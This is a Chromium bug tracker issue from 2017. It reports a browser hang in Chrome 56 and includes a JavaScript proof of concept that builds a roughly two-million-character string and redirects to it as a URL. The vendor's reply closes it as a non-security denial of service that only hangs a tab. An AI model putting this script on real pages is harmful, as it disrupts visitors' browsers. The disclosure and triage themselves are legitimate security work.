Issue 686025 link

Starred by 1 user

Issue metadata

Status:	WontFix
Owner:	----
Closed:	Jan 2017
EstimatedDays:	----
NextAction:	----
OS:	----
Pri:	----
Type:	Bug

Security: Google Chrome 56.0.2924.76 - address Overflow Denial of Service

Reported by wassl...@gmail.com, Jan 27 2017

Issue description

Hy Google Security I found a new Security bug in Chrome 56.0.2924.76.

Title: Google Chrome 56.0.2924.76 - address Overflow Denial of Service

Tested on: Win7 - Winxp

Author: Nassim Asrir

Explain: 

Last Year i find like this security issue in other Browser and now i test it on Chrome. now we have not more for explain just copy the Javascript code and upload it on Webserver and launch it in Chrome.

Code:

<script type="text/javascript">
 
function mul3 (str, num) {
    if (!num) return "";
    var orig = str,
        soFar = [str],
        added = 1,
        left, i;
    while (added < num) {
        left = num - added;
        str = orig;
        for (i = 2; i < left; i *= 2) {
            str += str;
        }
        soFar.push(str);
        added += (i / 2);
    }
    return soFar.join("");
 
}
 
var junka = "a";
 
var junk = mul3(junka,2097033);
 
 
window.location.href = "http://" + junk;
 
 
</script>
</head>
 
<body>
 
</body>
</html>

Comment 1 by est...@chromium.org, Jan 27 2017

Labels: -Type-Bug-Security -Restrict-View-SecurityTeam Type-Bug
Status: WontFix (was: Unconfirmed)

Thanks for the report. We don't consider denial of service bugs security issues (see https://www.chromium.org/Home/chromium-security/security-faq#TOC-Are-denial-of-service-issues-considered-security-bugs-).

In this case it looks like the repro hangs the tab. Since the user can just close the tab, I don't think there's anything that Chrome should do differently.

►

Issue 686025 link

Issue metadata

Security: Google Chrome 56.0.2924.76 - address Overflow Denial of Service

Issue description

Comment 1 by est...@chromium.org, Jan 27 2017

Comment 1 Deleted

Sign in to add a comment